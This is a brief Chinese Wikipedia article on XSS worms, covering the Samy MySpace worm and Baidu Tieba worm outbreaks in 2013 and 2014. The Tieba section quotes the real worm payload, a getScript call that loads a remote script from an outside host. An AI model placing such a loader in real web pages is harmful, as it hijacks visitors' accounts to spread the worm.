XSS蠕虫

XSS蠕虫(cross site scripting worm)是一种跨站病毒,通常由脚本语言Javascript写成,它借由网站访问者传播。

历史

历史第一个XSS蠕虫是针对网站MyspaceSamy,它在20小时内感染了100万个账户,作者Samy Kamkar之后被起诉。

新浪微博

对新浪微博的争议#XSS漏洞

百度贴吧

2013年5月19日,百度贴吧转帖功能再度出现xss漏洞,大量贴吧内充斥接近满版面,包含代码getScript('//xss.retaker.me/1.js')为标题的帖子,当已登陆用户打开这样的帖子,用户所持账户便以相同方式在多个贴吧转帖原作者的帖,部分网络安全相关人士认为贴吧爆发了大规模XSS蠕虫感染。[1] [2] [3]

2014年3月9日,百度贴吧转帖功能再度出现xss漏洞。

性质

由于XSS蠕虫基于浏览器而不是操作系统,取决于其依赖网站的规模,它可以在短时间内达到对巨大数量的计算机感染。

參見

参考

  1. ^ 百度贴吧XSS蠕虫大量爬行. [2013-05-19]. (原始内容存档于2020-08-11). 
  2. ^ 谷歌搜索
  3. ^ 新浪微博, "xss贴吧". [2013-05-19]. (原始内容存档于2019-02-07). 
This article is issued from Wikipedia. The text is available under Creative Commons Attribution-Share Alike 4.0 unless otherwise noted. Additional terms may apply for the media files.